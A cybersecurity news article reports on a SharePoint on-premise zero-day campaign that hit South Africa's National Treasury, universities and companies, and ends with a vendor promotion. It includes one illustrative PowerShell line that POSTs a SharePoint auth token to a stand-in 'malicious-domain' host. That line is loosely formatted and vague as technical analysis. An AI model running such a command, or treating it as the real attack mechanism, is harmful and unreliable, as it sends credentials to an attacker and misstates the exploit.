Microsoft SharePoint Server 0-Day Hack Hits African Treasury, Companies, and University

A sophisticated cyberattack exploiting a zero-day vulnerability in Microsoft SharePoint servers has compromised over 400 entities globally, with significant impact across African nations including South Africa and Mauritius.

The attack specifically targets on-premise SharePoint installations, exploiting previously unknown security flaws that allowed threat actors to infiltrate critical infrastructure systems belonging to government agencies, educational institutions, and private corporations.

The malware campaign emerged last week when Dutch cybersecurity firm Eye Security detected the initial wave of breaches.

Unlike typical SharePoint vulnerabilities that affect cloud-hosted instances, this zero-day specifically targets organizations running SharePoint servers on their own infrastructure—a configuration many institutions prefer for enhanced control and security.

The attack vector leverages unauthorized code execution capabilities within SharePoint’s document collaboration framework, enabling attackers to establish persistent access to targeted networks.

Business Insider Africa analysts identified the malware’s sophisticated behavior patterns, noting its ability to remain undetected while exfiltrating sensitive data from compromised systems.

In South Africa alone, victims span multiple sectors including a major automotive manufacturer, several universities, local government entities, and the National Treasury, where malware was discovered on the Infrastructure Reporting Model website.

Infection Mechanism and Technical Analysis

The SharePoint zero-day exploits a remote code execution vulnerability in the server’s authentication mechanism, allowing attackers to bypass standard security controls.

Technical analysis reveals the malware employs a multi-stage payload delivery system:-

# Example of potential exploitation vector
Invoke-WebRequest -Uri "http://malicious-domain/payload.aspx" 
-Method POST -Body $sharepoint_auth_token

The attack begins with reconnaissance scans targeting SharePoint farms running vulnerable versions, followed by exploitation of the authentication bypass to inject malicious web shells.

Microsoft has confirmed the vulnerability affects only on-premise installations, with cloud-hosted SharePoint Online services remaining secure through Microsoft’s managed security infrastructure.

Integrate ANY.RUN TI Lookup with your SIEM or SOAR To Analyses Advanced Threats -> Try 50 Free Trial Searches